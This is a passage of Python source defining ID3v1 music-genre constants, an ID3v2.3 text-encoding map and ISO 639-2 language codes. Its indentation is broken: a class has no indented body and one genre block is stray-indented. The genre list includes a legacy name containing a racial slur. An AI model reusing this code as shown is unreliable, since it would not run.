GENRE_2_NAME[NATIVE_AMERICAN] = NATIVE_AMERICAN_NAME
CABARET = 65
CABARET_NAME = 'Cabaret'
GENRE_2_NAME[CABARET] = CABARET_NAME
NEW_WAVE = 66
NEW_WAVE_NAME = 'New Wave'
GENRE_2_NAME[NEW_WAVE] = NEW_WAVE_NAME
PSYCHADELIC = 67
PSYCHADELIC_NAME = 'Psychadelic'
GENRE_2_NAME[PSYCHADELIC] = PSYCHADELIC_NAME
RAVE = 68
RAVE_NAME = 'Rave'
GENRE_2_NAME[RAVE] = RAVE_NAME
SHOWTUNES = 69
SHOWTUNES_NAME = 'Showtunes'
GENRE_2_NAME[SHOWTUNES] = SHOWTUNES_NAME
TRAILER = 70
TRAILER_NAME = 'Trailer'
GENRE_2_NAME[TRAILER] = TRAILER_NAME
LO_FI = 71
LO_FI_NAME = 'Lo-Fi'
GENRE_2_NAME[LO_FI] = LO_FI_NAME
TRIBAL = 72
TRIBAL_NAME = 'Tribal'
GENRE_2_NAME[TRIBAL] = TRIBAL_NAME
ACID_PUNK = 73
ACID_PUNK_NAME = 'Acid Punk'
GENRE_2_NAME[ACID_PUNK] = ACID_PUNK_NAME
ACID_JAZZ = 74
ACID_JAZZ_NAME = 'Acid Jazz'
GENRE_2_NAME[ACID_JAZZ] = ACID_JAZZ_NAME
POLKA = 75
POLKA_NAME = 'Polka'
GENRE_2_NAME[POLKA] = POLKA_NAME
RETRO = 76
RETRO_NAME = 'Retro'
GENRE_2_NAME[RETRO] = RETRO_NAME
MUSICAL = 77
MUSICAL_NAME = 'Musical'
GENRE_2_NAME[MUSICAL] = MUSICAL_NAME
ROCK_N_ROLL = 78
ROCK_N_ROLL_NAME = 'Rock & Roll'
GENRE_2_NAME[ROCK_N_ROLL] = ROCK_N_ROLL_NAME
HARD_ROCK = 79
HARD_ROCK_NAME = 'Hard Rock'
GENRE_2_NAME[HARD_ROCK] = HARD_ROCK_NAME
FOLK = 80
FOLK_NAME = 'Folk'
GENRE_2_NAME[FOLK] = FOLK_NAME
FOLK_ROCK = 81
FOLK_ROCK_NAME = 'Folk-Rock'
GENRE_2_NAME[FOLK_ROCK] = FOLK_ROCK_NAME
NATIONAL_FOLK = 82
NATIONAL_FOLK_NAME = 'National Folk'
GENRE_2_NAME[NATIONAL_FOLK] = NATIONAL_FOLK_NAME
SWING = 83
SWING_NAME = 'Swing'
GENRE_2_NAME[SWING] = SWING_NAME
FAST_FUSION = 84
FAST_FUSION_NAME = 'Fast Fusion'
GENRE_2_NAME[FAST_FUSION] = FAST_FUSION_NAME
BEBOB = 85
BEBOB_NAME = 'Bebob'
GENRE_2_NAME[BEBOB] = BEBOB_NAME
LATIN = 86
LATIN_NAME = 'Latin'
GENRE_2_NAME[LATIN] = LATIN_NAME
REVIVAL = 87
REVIVAL_NAME = 'Revival'
GENRE_2_NAME[REVIVAL] = REVIVAL_NAME
CELTIC = 88
CELTIC_NAME = 'Celtic'
GENRE_2_NAME[CELTIC] = CELTIC_NAME
BLUEGRASS = 89
BLUEGRASS_NAME = 'Bluegrass'
GENRE_2_NAME[BLUEGRASS] = BLUEGRASS_NAME
AVANTGARDE = 90
AVANTGARDE_NAME = 'Avantgarde'
GENRE_2_NAME[AVANTGARDE] = AVANTGARDE_NAME
GOTHIC_ROCK = 91
GOTHIC_ROCK_NAME = 'Gothic Rock'
GENRE_2_NAME[GOTHIC_ROCK] = GOTHIC_ROCK_NAME
PROGRESSIVE_ROCK = 92
PROGRESSIVE_ROCK_NAME = 'Progressive Rock'
GENRE_2_NAME[PROGRESSIVE_ROCK] = PROGRESSIVE_ROCK_NAME
PSYCHEDELIC_ROCK = 93
PSYCHEDELIC_ROCK_NAME = 'Psychedelic Rock'
GENRE_2_NAME[PSYCHEDELIC_ROCK] = PSYCHEDELIC_ROCK_NAME
SYMPHONIC_ROCK = 94
SYMPHONIC_ROCK_NAME = 'Symphonic Rock'
GENRE_2_NAME[SYMPHONIC_ROCK] = SYMPHONIC_ROCK_NAME
SLOW_ROCK = 95
SLOW_ROCK_NAME = 'Slow Rock'
GENRE_2_NAME[SLOW_ROCK] = SLOW_ROCK_NAME
BIG_BAND = 96
BIG_BAND_NAME = 'Big Band'
GENRE_2_NAME[BIG_BAND] = BIG_BAND_NAME
CHORUS = 97
CHORUS_NAME = 'Chorus'
GENRE_2_NAME[CHORUS] = CHORUS_NAME
EASY_LISTENING = 98
EASY_LISTENING_NAME = 'Easy Listening'
GENRE_2_NAME[EASY_LISTENING] = EASY_LISTENING_NAME
ACOUSTIC = 99
ACOUSTIC_NAME = 'Acoustic'
GENRE_2_NAME[ACOUSTIC] = ACOUSTIC_NAME
HUMOR = 100
HUMOR_NAME = 'Humour'
GENRE_2_NAME[HUMOR] = HUMOR_NAME
SPEECH = 101
SPEECH_NAME = 'Speech'
GENRE_2_NAME[SPEECH] = SPEECH_NAME
CHANSON = 102
CHANSON_NAME = 'Chanson'
GENRE_2_NAME[CHANSON] = CHANSON_NAME
OPERA = 103
OPERA_NAME = 'Opera'
GENRE_2_NAME[OPERA] = OPERA_NAME
CHAMBER_MUSIC = 104
CHAMBER_MUSIC_NAME = 'Chamber Music'
GENRE_2_NAME[CHAMBER_MUSIC] = CHAMBER_MUSIC_NAME
SONATA = 105
SONATA_NAME = 'Sonata'
GENRE_2_NAME[SONATA] = SONATA_NAME
SYMPHONY = 106
SYMPHONY_NAME = 'Symphony'
GENRE_2_NAME[SYMPHONY] = SYMPHONY_NAME
BOOTY_BASS = 107
BOOTY_BASS_NAME = 'Booty Bass'
GENRE_2_NAME[BOOTY_BASS] = BOOTY_BASS_NAME
PRIMUS = 108
PRIMUS_NAME = 'Primus'
GENRE_2_NAME[PRIMUS] = PRIMUS_NAME
PORN_GROOVE = 109
PORN_GROOVE_NAME = 'Porn Groove'
GENRE_2_NAME[PORN_GROOVE] = PORN_GROOVE_NAME
    SATIRE = 110
    SATIRE_NAME = 'Satire'
    GENRE_2_NAME[SATIRE] = SATIRE_NAME
SLOW_JAM = 111
SLOW_JAM_NAME = 'Slow Jam'
GENRE_2_NAME[SLOW_JAM] = SLOW_JAM_NAME
CLUB = 112
CLUB_NAME = 'Club'
GENRE_2_NAME[CLUB] = CLUB_NAME
TANGO = 113
TANGO_NAME = 'Tango'
GENRE_2_NAME[TANGO] = TANGO_NAME
SAMBA = 114
SAMBA_NAME = 'Samba'
GENRE_2_NAME[SAMBA] = SAMBA_NAME
FOLKLORE = 115
FOLKLORE_NAME = 'Folklore'
GENRE_2_NAME[FOLKLORE] = FOLKLORE_NAME
BALLAD = 116
BALLAD_NAME = 'Ballad'
GENRE_2_NAME[BALLAD] = BALLAD_NAME
POWER_BALLAD = 117
POWER_BALLAD_NAME = 'Power Ballad'
GENRE_2_NAME[POWER_BALLAD] = POWER_BALLAD_NAME
RHYTHMIC_SOUL = 118
RHYTHMIC_SOUL_NAME = 'Rhythmic Soul'
GENRE_2_NAME[RHYTHMIC_SOUL] = RHYTHMIC_SOUL_NAME
FREESTYLE = 119
FREESTYLE_NAME = 'Freestyle'
GENRE_2_NAME[FREESTYLE] = FREESTYLE_NAME
DUET = 120
DUET_NAME = 'Duet'
GENRE_2_NAME[DUET] = DUET_NAME
PUNK_ROCK = 121
PUNK_ROCK_NAME = 'Punk Rock'
GENRE_2_NAME[PUNK_ROCK] = PUNK_ROCK_NAME
DRUM_SOLO = 122
DRUM_SOLO_NAME = 'Drum Solo'
GENRE_2_NAME[DRUM_SOLO] = DRUM_SOLO_NAME
A_CAPELLA = 123
A_CAPELLA_NAME = 'A capella'
GENRE_2_NAME[A_CAPELLA] = A_CAPELLA_NAME
EURO_HOUSE = 124
EURO_HOUSE_NAME = 'Euro-House'
GENRE_2_NAME[EURO_HOUSE] = EURO_HOUSE_NAME
DANCE_HALL = 125
DANCE_HALL_NAME = 'Dance Hall'
GENRE_2_NAME[DANCE_HALL] = DANCE_HALL_NAME
GOA = 126
GOA_NAME = 'Goa'
GENRE_2_NAME[GOA] = GOA_NAME
DRUM_N_BASS = 127
DRUM_N_BASS_NAME = 'Drum & Bass'
GENRE_2_NAME[DRUM_N_BASS] = DRUM_N_BASS_NAME
CLUB_HOUSE = 128
CLUB_HOUSE_NAME = 'Club-House'
GENRE_2_NAME[CLUB_HOUSE] = CLUB_HOUSE_NAME
HARDCORE = 129
HARDCORE_NAME = 'Hardcore'
GENRE_2_NAME[HARDCORE] = HARDCORE_NAME
TERROR = 130
TERROR_NAME = 'Terror'
GENRE_2_NAME[TERROR] = TERROR_NAME
INDIE = 131
INDIE_NAME = 'Indie'
GENRE_2_NAME[INDIE] = INDIE_NAME
BRITPOP = 132
BRITPOP_NAME = 'BritPop'
GENRE_2_NAME[BRITPOP] = BRITPOP_NAME
NEGERPUNK = 133
NEGERPUNK_NAME = 'Negerpunk'
GENRE_2_NAME[NEGERPUNK] = NEGERPUNK_NAME
POLSK_PUNK = 134
POLSK_PUNK_NAME = 'Polsk Punk'
GENRE_2_NAME[POLSK_PUNK] = POLSK_PUNK_NAME
BEAT = 135
BEAT_NAME = 'Beat'
GENRE_2_NAME[BEAT] = BEAT_NAME
CHRISTIAN = 136
CHRISTIAN_NAME = 'Christian'
GENRE_2_NAME[CHRISTIAN] = CHRISTIAN_NAME
HEAVY_METAL = 137
HEAVY_METAL_NAME = 'Heavy Metal'
GENRE_2_NAME[HEAVY_METAL] = HEAVY_METAL_NAME
BLACK_METAL = 138
BLACK_METAL_NAME = 'Black Metal'
GENRE_2_NAME[BLACK_METAL] = BLACK_METAL_NAME
CROSSOVER = 139
CROSSOVER_NAME = 'Crossover'
GENRE_2_NAME[CROSSOVER] = CROSSOVER_NAME
CONTEMPORARY = 140
CONTEMPORARY_NAME = 'Contemporary'
GENRE_2_NAME[CONTEMPORARY] = CONTEMPORARY_NAME
CHRISTIAN_ROCK = 141
CHRISTIAN_ROCK_NAME = 'Christian Rock'
GENRE_2_NAME[CHRISTIAN_ROCK] = CHRISTIAN_ROCK_NAME
MERENGUE = 142
MERENGUE_NAME = 'Merengue'
GENRE_2_NAME[MERENGUE] = MERENGUE_NAME
SALSA = 143
SALSA_NAME = 'Salsa'
GENRE_2_NAME[SALSA] = SALSA_NAME
THRASH_METAL = 144
THRASH_METAL_NAME = 'Thrash Metal'
GENRE_2_NAME[THRASH_METAL] = THRASH_METAL_NAME
ANIME = 145
ANIME_NAME = 'Anime'
GENRE_2_NAME[ANIME] = ANIME_NAME
JPOP = 146
JPOP_NAME = 'JPop'
GENRE_2_NAME[JPOP] = JPOP_NAME
SYNTHPOP = 147
SYNTHPOP_NAME = 'Synthpop'
GENRE_2_NAME[SYNTHPOP] = SYNTHPOP_NAME
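# Editor's sketch (illustrative helper, not part of the original API): map a
# raw ID3v1 genre id to its display name, falling back to 'Other' (12).
def _genre_name(genre_id):
    return ID3v1_GENRES.GENRE_2_NAME.get(genre_id, ID3v1_GENRES.OTHER_NAME)
# e.g. _genre_name(17) == 'Rock'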
class ID3v2_3ENCODING(object):
ISO_8859_1 = '\x00'
UNICODE = '\x01'
ID3v2_3_ENCODING_DICT = {ID3v2_3ENCODING.ISO_8859_1: 'latin-1', ID3v2_3ENCODING.UNICODE: 'utf-16'}
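# Editor's sketch (illustrative, assumes Python 2 byte strings to match the
# '\x00'/'\x01' keys above): decode an ID3v2.3 text frame payload, whose first
# byte selects the encoding.
def _decode_text_payload(payload):
    codec = ID3v2_3_ENCODING_DICT.get(payload[0], 'latin-1')
    return payload[1:].decode(codec)
# e.g. _decode_text_payload('\x00Title') == u'Title'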
LANGUAGE_CODES_ISO_639_2_DICT = {
'aar': 'Afar',
'abk': 'Abkhazian',
'ace': 'Achinese',
'ach': 'Acoli',
'ada': 'Adangme',
'ady': 'Adyghe; Adygei',
'afa': 'Afro-Asiatic languages',
'afh': 'Afrihili',
'afr': 'Afrikaans',
'ain': 'Ainu',
'aka': 'Akan',
'akk': 'Akkadian',
'alb': 'Albanian',
'ale': 'Aleut',
'alg': 'Algonquian languages',
'alt': 'Southern Altai',
'amh': 'Amharic',
'ang': 'English, Old (ca.450-1100)',
'anp': 'Angika',
'apa': 'Apache languages',
'ara': 'Arabic',
'arc': 'Official Aramaic (700-300 BCE); Imperial Aramaic (700-300 BCE)',
'arg': 'Aragonese',
'arm': 'Armenian',
'arn': 'Mapudungun; Mapuche',
'arp': 'Arapaho',
'art': 'Artificial languages',
'arw': 'Arawak',
'asm': 'Assamese',
'ast': 'Asturian; Bable; Leonese; Asturleonese',
'ath': 'Athapascan languages',
'aus': 'Australian languages',
'ava': 'Avaric',
'ave': 'Avestan',
'awa': 'Awadhi',
'aym': 'Aymara',
'aze': 'Azerbaijani',
'bad': 'Banda languages',
'bai': 'Bamileke languages',
'bak': 'Bashkir',
'bal': 'Baluchi',
'bam': 'Bambara',
'ban': 'Balinese',
'baq': 'Basque',
'bas': 'Basa',
'bat': 'Baltic languages',
'bej': 'Beja; Bedawiyet',
'bel': 'Belarusian',
'bem': 'Bemba',
'ben': 'Bengali',
'ber': 'Berber languages',
'bho': 'Bhojpuri',
'bih': 'Bihari languages',
'bik': 'Bikol',
'bin': 'Bini; Edo',
'bis': 'Bislama',
'bla': 'Siksika',
'bnt': 'Bantu languages',
'bod': 'Tibetan',
'bos': 'Bosnian',
'bra': 'Braj',
'bre': 'Breton',
'btk': 'Batak languages',
'bua': 'Buriat',
'bug': 'Buginese',
'bul': 'Bulgarian',
'bur': 'Burmese',
'byn': 'Blin; Bilin',
'cad': 'Caddo',
'cai': 'Central American Indian languages',
'car': 'Galibi Carib',
'cat': 'Catalan; Valencian',
'cau': 'Caucasian languages',
'ceb': 'Cebuano',
'cel': 'Celtic languages',
'ces': 'Czech',
'cha': 'Chamorro',
'chb': 'Chibcha',
'che': 'Chechen',
'chg': 'Chagatai',
'chi': 'Chinese',
'chk': 'Chuukese',
'chm': 'Mari',
'chn': 'Chinook jargon',
'cho': 'Choctaw',
'chp': 'Chipewyan; Dene Suline',
'chr': 'Cherokee',
'chu': 'Church Slavic; Old Slavonic; Church Slavonic; Old Bulgarian; Old Church Slavonic',
'chv': 'Chuvash',
'chy': 'Cheyenne',
'cmc': 'Chamic languages',
'cnr': 'Montenegrin',
'cop': 'Coptic',
'cor': 'Cornish',
'cos': 'Corsican',
'cpe': 'Creoles and pidgins, English based',
'cpf': 'Creoles and pidgins, French-based',
'cpp': 'Creoles and pidgins, Portuguese-based',
'cre': 'Cree',
'crh': 'Crimean Tatar; Crimean Turkish',
'crp': 'Creoles and pidgins',
'csb': 'Kashubian',
'cus': 'Cushitic languages',
'cym': 'Welsh',
'cze': 'Czech',
'dak': 'Dakota',
'dan': 'Danish',
'dar': 'Dargwa',
'day': 'Land Dayak languages',
'del': 'Delaware',
'den': 'Slave (Athapascan)',
'deu': 'German',
'dgr': 'Dogrib',
'din': 'Dinka',
'div': 'Divehi; Dhivehi; Maldivian',
'doi': 'Dogri',
'dra': 'Dravidian languages',
'dsb': 'Lower Sorbian',
'dua': 'Duala',
'dum': 'Dutch, Middle (ca.1050-1350)',
'dut': 'Dutch; Flemish',
'dyu': 'Dyula',
'dzo': 'Dzongkha',
'efi': 'Efik',
'egy': 'Egyptian (Ancient)',
'eka': 'Ekajuk',
'ell': 'Greek, Modern (1453-)',
'elx': 'Elamite',
'eng': 'English',
'enm': 'English, Middle (1100-1500)',
'epo': 'Esperanto',
'est': 'Estonian',
'eus': 'Basque',
'ewe': 'Ewe',
'ewo': 'Ewondo',
'fan': 'Fang',
'fao': 'Faroese',
'fas': 'Persian',
'fat': 'Fanti',
'fij': 'Fijian',
'fil': 'Filipino; Pilipino',
'fin': 'Finnish',
'fiu': 'Finno-Ugrian languages',
'fon': 'Fon',
'fre': 'French',
'fra': 'French',
'frm': 'French, Middle (ca.1400-1600)',
'fro': 'French, Old (842-ca.1400)',
'frr': 'Northern Frisian',
'frs': 'Eastern Frisian',
'fry': 'Western Frisian',
'ful': 'Fulah',
'fur': 'Friulian',
'gaa': 'Ga',
'gay': 'Gayo',
'gba': 'Gbaya',
'gem': 'Germanic languages',
'geo': 'Georgian',
'ger': 'German',
'gez': 'Geez',
'gil': 'Gilbertese',
'gla': 'Gaelic; Scottish Gaelic',
'gle': 'Irish',
'glg': 'Galician',
'glv': 'Manx',
'gmh': 'German, Middle High (ca.1050-1500)',
'goh': 'German, Old High (ca.750-1050)',
'gon': 'Gondi',
'gor': 'Gorontalo',
'got': 'Gothic',
'grb': 'Grebo',
'grc': 'Greek, Ancient (to 1453)',
'gre': 'Greek, Modern (1453-)',
'grn': 'Guarani',
'gsw': 'Swiss German; Alemannic; Alsatian',
'guj': 'Gujarati',
'gwi': 'Gwich\'in',
'hai': 'Haida',
'hat': 'Haitian; Haitian Creole',
'hau': 'Hausa',
'haw': 'Hawaiian',
'heb': 'Hebrew',
'her': 'Herero',
'hil': 'Hiligaynon',
'him': 'Himachali languages; Western Pahari languages',
'hin': 'Hindi',
'hit': 'Hittite',
'hmn': 'Hmong; Mong',
'hmo': 'Hiri Motu',
'hrv': 'Croatian',
'hsb': 'Upper Sorbian',
'hun': 'Hungarian',
'hup': 'Hupa',
'hye': 'Armenian',
'iba': 'Iban',
'ibo': 'Igbo',
'ice': 'Icelandic',
'isl': 'Icelandic',
'ido': 'Ido',
'iii': 'Sichuan Yi; Nuosu',
'ijo': 'Ijo languages',
'iku': 'Inuktitut',
'ile': 'Interlingue; Occidental',
'ilo': 'Iloko',
'ina': 'Interlingua (International Auxiliary Language Association)',
'inc': 'Indic languages',
'ind': 'Indonesian',
'ine': 'Indo-European languages',
'inh': 'Ingush',
'ipk': 'Inupiaq',
'ira': 'Iranian languages',
'iro': 'Iroquoian languages',
'ita': 'Italian',
'jav': 'Javanese',
'jbo': 'Lojban',
'jpn': 'Japanese',
'jpr': 'Judeo-Persian',
'jrb': 'Judeo-Arabic',
'kaa': 'Kara-Kalpak',
'kab': 'Kabyle',
'kac': 'Kachin; Jingpho',
'kal': 'Kalaallisut; Greenlandic',
'kam': 'Kamba',
'kan': 'Kannada',
'kar': 'Karen languages',
'kas': 'Kashmiri',
'kat': 'Georgian',
'kau': 'Kanuri',
'kaw': 'Kawi',
'kaz': 'Kazakh',
'kbd': 'Kabardian',
'kha': 'Khasi',
'khi': 'Khoisan languages',
'khm': 'Central Khmer',
'kho': 'Khotanese; Sakan',
'kik': 'Kikuyu; Gikuyu',
'kin': 'Kinyarwanda',
'kir': 'Kirghiz; Kyrgyz',
'kmb': 'Kimbundu',
'kok': 'Konkani',
'kom': 'Komi',
'kon': 'Kongo',
'kor': 'Korean',
'kos': 'Kosraean',
'kpe': 'Kpelle',
'krc': 'Karachay-Balkar',
'krl': 'Karelian',
'kro': 'Kru languages',
'kru': 'Kurukh',
'kua': 'Kuanyama; Kwanyama',
'kum': 'Kumyk',
'kur': 'Kurdish',
'kut': 'Kutenai',
'lad': 'Ladino',
'lah': 'Lahnda',
'lam': 'Lamba',
'lao': 'Lao',
'lat': 'Latin',
'lav': 'Latvian',
'lez': 'Lezghian',
'lim': 'Limburgan; Limburger; Limburgish',
'lin': 'Lingala',
'lit': 'Lithuanian',
'lol': 'Mongo',
'loz': 'Lozi',
'ltz': 'Luxembourgish; Letzeburgesch',
'lua': 'Luba-Lulua',
'lub': 'Luba-Katanga',
'lug': 'Ganda',
'lui': 'Luiseno',
'lun': 'Lunda',
'luo': 'Luo (Kenya and Tanzania)',
'lus': 'Lushai',
'mac': 'Macedonian',
'mad': 'Madurese',
'mag': 'Magahi',
'mah': 'Marshallese',
'mai': 'Maithili',
'mak': 'Makasar',
'mal': 'Malayalam',
'man': 'Mandingo',
'mao': 'Maori',
'map': 'Austronesian languages',
'mar': 'Marathi',
'mas': 'Masai',
'may': 'Malay',
'mdf': 'Moksha',
'mdr': 'Mandar',
'men': 'Mende',
'mga': 'Irish, Middle (900-1200)',
'mic': 'Mi\'kmaq; Micmac',
'min': 'Minangkabau',
'mis': 'Uncoded languages',
'mkd': 'Macedonian',
'mkh': 'Mon-Khmer languages',
'mlg': 'Malagasy',
'mlt': 'Maltese',
'mnc': 'Manchu',
'mni': 'Manipuri',
'mno': 'Manobo languages',
'moh': 'Mohawk',
'mon': 'Mongolian',
'mos': 'Mossi',
'mri': 'Maori',
'msa': 'Malay',
'mul': 'Multiple languages',
'mun': 'Munda languages',
'mus': 'Creek',
'mwl': 'Mirandese',
'mwr': 'Marwari',
'mya': 'Burmese',
'myn': 'Mayan languages',
'myv': 'Erzya',
'nah': 'Nahuatl languages',
'nai': 'North American Indian languages',
'nap': 'Neapolitan',
'nau': 'Nauru',
'nav': 'Navajo; Navaho',
'nbl': 'Ndebele, South; South Ndebele',
'nde': 'Ndebele, North; North Ndebele',
'ndo': 'Ndonga',
'nds': 'Low German; Low Saxon; German, Low; Saxon, Low',
'nep': 'Nepali',
'new': 'Nepal Bhasa; Newari',
'nia': 'Nias',
'nic': 'Niger-Kordofanian languages',
'niu': 'Niuean',
'nld': 'Dutch; Flemish',
'nno': 'Norwegian Nynorsk; Nynorsk, Norwegian',
'nob': 'Bokmål, Norwegian; Norwegian Bokmål',
'nog': 'Nogai',
'non': 'Norse, Old',
'nor': 'Norwegian',
'nqo': 'N\'Ko',
'nso': 'Pedi; Sepedi; Northern Sotho',
'nub': 'Nubian languages',
'nwc': 'Classical Newari; Old Newari; Classical Nepal Bhasa',
'nya': 'Chichewa; Chewa; Nyanja',
'nym': 'Nyamwezi',
'nyn': 'Nyankole',
'nyo': 'Nyoro',
'nzi': 'Nzima',
'oci': 'Occitan (post 1500)',
'oji': 'Ojibwa',
'ori': 'Oriya',
'orm': 'Oromo',
'osa': 'Osage',
'oss': 'Ossetian; Ossetic',
'ota': 'Turkish, Ottoman (1500-1928)',
'oto': 'Otomian languages',
'paa': 'Papuan languages',
'pag': 'Pangasinan',
'pal': 'Pahlavi',
'pam': 'Pampanga; Kapampangan',
'pan': 'Panjabi; Punjabi',
'pap': 'Papiamento',
'pau': 'Palauan',
'peo': 'Persian, Old (ca.600-400 B.C.)',
'per': 'Persian',
'phi': 'Philippine languages',
'phn': 'Phoenician',
'pli': 'Pali',
'pol': 'Polish',
'pon': 'Pohnpeian',
'por': 'Portuguese',
'pra': 'Prakrit languages',
'pro': 'Provençal, Old (to 1500);Occitan, Old (to 1500)',
'pus': 'Pushto; Pashto',
'qaa': 'Reserved for local use',
'qab': 'Reserved for local use',
'qac': 'Reserved for local use',
'qad': 'Reserved for local use',
'qae': 'Reserved for local use',
'qaf': 'Reserved for local use',
'qag': 'Reserved for local use',
'qah': 'Reserved for local use',
'qai': 'Reserved for local use',
'qaj': 'Reserved for local use',
'qak': 'Reserved for local use',
'qal': 'Reserved for local use',
'qam': 'Reserved for local use',
'qan': 'Reserved for local use',
'qao': 'Reserved for local use',
'qap': 'Reserved for local use',
'qaq': 'Reserved for local use',
'qar': 'Reserved for local use',
'qas': 'Reserved for local use',
'qat': 'Reserved for local use',
'qau': 'Reserved for local use',
'qav': 'Reserved for local use',
'qaw': 'Reserved for local use',
'qax': 'Reserved for local use',
'qay': 'Reserved for local use',
'qaz': 'Reserved for local use',
'qba': 'Reserved for local use',
'qbb': 'Reserved for local use',
'qbc': 'Reserved for local use',
'qbd': 'Reserved for local use',
'qbe': 'Reserved for local use',
'qbf': 'Reserved for local use',
'qbg': 'Reserved for local use',
'qbh': 'Reserved for local use',
'qbi': 'Reserved for local use',
'qbj': 'Reserved for local use',
'qbk': 'Reserved for local use',
'qbl': 'Reserved for local use',
'qbm': 'Reserved for local use',
'qbn': 'Reserved for local use',
'qbo': 'Reserved for local use',
'qbp': 'Reserved for local use',
'qbq': 'Reserved for local use',
'qbr': 'Reserved for local use',
'qbs': 'Reserved for local use',
'qbt': 'Reserved for local use',
'qbu': 'Reserved for local use',
'qbv': 'Reserved for local use',
'qbw': 'Reserved for local use',
'qbx': 'Reserved for local use',
'qby': 'Reserved for local use',
'qbz': 'Reserved for local use',
'qca': 'Reserved for local use',
'qcb': 'Reserved for local use',
'qcc': 'Reserved for local use',
'qcd': 'Reserved for local use',
'qce': 'Reserved for local use',
'qcf': 'Reserved for local use',
'qcg': 'Reserved for local use',
'qch': 'Reserved for local use',
'qci': 'Reserved for local use',
'qcj': 'Reserved for local use',
'qck': 'Reserved for local use',
'qcl': 'Reserved for local use',
'qcm': 'Reserved for local use',
'qcn': 'Reserved for local use',
'qco': 'Reserved for local use',
'qcp': 'Reserved for local use',
'qcq': 'Reserved for local use',
'qcr': 'Reserved for local use',
'qcs': 'Reserved for local use',
'qct': 'Reserved for local use',
'qcu': 'Reserved for local use',
'qcv': 'Reserved for local use',
'qcw': 'Reserved for local use',
'qcx': 'Reserved for local use',
'qcy': 'Reserved for local use',
'qcz': 'Reserved for local use',
'qda': 'Reserved for local use',
'qdb': 'Reserved for local use',
'qdc': 'Reserved for local use',
'qdd': 'Reserved for local use',
'qde': 'Reserved for local use',
'qdf': 'Reserved for local use',
'qdg': 'Reserved for local use',
'qdh': 'Reserved for local use',
'qdi': 'Reserved for local use',
'qdj': 'Reserved for local use',
'qdk': 'Reserved for local use',
'qdl': 'Reserved for local use',
'qdm': 'Reserved for local use',
'qdn': 'Reserved for local use',
'qdo': 'Reserved for local use',
'qdp': 'Reserved for local use',
'qdq': 'Reserved for local use',
'qdr': 'Reserved for local use',
'qds': 'Reserved for local use',
'qdt': 'Reserved for local use',
'qdu': 'Reserved for local use',
'qdv': 'Reserved for local use',
'qdw': 'Reserved for local use',
'qdx': 'Reserved for local use',
'qdy': 'Reserved for local use',
'qdz': 'Reserved for local use',
'qea': 'Reserved for local use',
'qeb': 'Reserved for local use',
'qec': 'Reserved for local use',
'qed': 'Reserved for local use',
'qee': 'Reserved for local use',
'qef': 'Reserved for local use',
'qeg': 'Reserved for local use',
'qeh': 'Reserved for local use',
'qei': 'Reserved for local use',
'qej': 'Reserved for local use',
'qek': 'Reserved for local use',
'qel': 'Reserved for local use',
'qem': 'Reserved for local use',
'qen': 'Reserved for local use',
'qeo': 'Reserved for local use',
'qep': 'Reserved for local use',
'qeq': 'Reserved for local use',
'qer': 'Reserved for local use',
'qes': 'Reserved for local use',
'qet': 'Reserved for local use',
'qeu': 'Reserved for local use',
'qev': 'Reserved for local use',
'qew': 'Reserved for local use',
'qex': 'Reserved for local use',
'qey': 'Reserved for local use',
'qez': 'Reserved for local use',
'qfa': 'Reserved for local use',
'qfb': 'Reserved for local use',
'qfc': 'Reserved for local use',
'qfd': 'Reserved for local use',
'qfe': 'Reserved for local use',
'qff': 'Reserved for local use',
'qfg': 'Reserved for local use',
'qfh': 'Reserved for local use',
'qfi': 'Reserved for local use',
'qfj': 'Reserved for local use',
'qfk': 'Reserved for local use',
'qfl': 'Reserved for local use',
'qfm': 'Reserved for local use',
'qfn': 'Reserved for local use',
'qfo': 'Reserved for local use',
'qfp': 'Reserved for local use',
'qfq': 'Reserved for local use',
'qfr': 'Reserved for local use',
'qfs': 'Reserved for local use',
'qft': 'Reserved for local use',
'qfu': 'Reserved for local use',
'qfv': 'Reserved for local use',
'qfw': 'Reserved for local use',
'qfx': 'Reserved for local use',
'qfy': 'Reserved for local use',
'qfz': 'Reserved for local use',
'qga': 'Reserved for local use',
'qgb': 'Reserved for local use',
'qgc': 'Reserved for local use',
'qgd': 'Reserved for local use',
'qge': 'Reserved for local use',
'qgf': 'Reserved for local use',
'qgg': 'Reserved for local use',
'qgh': 'Reserved for local use',
'qgi': 'Reserved for local use',
'qgj': 'Reserved for local use',
'qgk': 'Reserved for local use',
'qgl': 'Reserved for local use',
'qgm': 'Reserved for local use',
'qgn': 'Reserved for local use',
'qgo': 'Reserved for local use',
'qgp': 'Reserved for local use',
'qgq': 'Reserved for local use',
'qgr': 'Reserved for local use',
'qgs': 'Reserved for local use',
'qgt': 'Reserved for local use',
'qgu': 'Reserved for local use',
'qgv': 'Reserved for local use',
'qgw': 'Reserved for local use',
'qgx': 'Reserved for local use',
'qgy': 'Reserved for local use',
'qgz': 'Reserved for local use',
'qha': 'Reserved for local use',
'qhb': 'Reserved for local use',
'qhc': 'Reserved for local use',
'qhd': 'Reserved for local use',
'qhe': 'Reserved for local use',
'qhf': 'Reserved for local use',
'qhg': 'Reserved for local use',
'qhh': 'Reserved for local use',
'qhi': 'Reserved for local use',
'qhj': 'Reserved for local use',
'qhk': 'Reserved for local use',
'qhl': 'Reserved for local use',
'qhm': 'Reserved for local use',
'qhn': 'Reserved for local use',
'qho': 'Reserved for local use',
'qhp': 'Reserved for local use',
'qhq': 'Reserved for local use',
'qhr': 'Reserved for local use',
'qhs': 'Reserved for local use',
'qht': 'Reserved for local use',
'qhu': 'Reserved for local use',
'qhv': 'Reserved for local use',
'qhw': 'Reserved for local use',
'qhx': 'Reserved for local use',
'qhy': 'Reserved for local use',
'qhz': 'Reserved for local use',
'qia': 'Reserved for local use',
'qib': 'Reserved for local use',
'qic': 'Reserved for local use',
'qid': 'Reserved for local use',
'qie': 'Reserved for local use',
'qif': 'Reserved for local use',
'qig': 'Reserved for local use',
'qih': 'Reserved for local use',
'qii': 'Reserved for local use',
'qij': 'Reserved for local use',
'qik': 'Reserved for local use',
'qil': 'Reserved for local use',
'qim': 'Reserved for local use',
'qin': 'Reserved for local use',
'qio': 'Reserved for local use',
'qip': 'Reserved for local use',
'qiq': 'Reserved for local use',
'qir': 'Reserved for local use',
'qis': 'Reserved for local use',
'qit': 'Reserved for local use',
'qiu': 'Reserved for local use',
'qiv': 'Reserved for local use',
'qiw': 'Reserved for local use',
'qix': 'Reserved for local use',
'qiy': 'Reserved for local use',
'qiz': 'Reserved for local use',
'qja': 'Reserved for local use',
'qjb': 'Reserved for local use',
'qjc': 'Reserved for local use',
'qjd': 'Reserved for local use',
'qje': 'Reserved for local use',
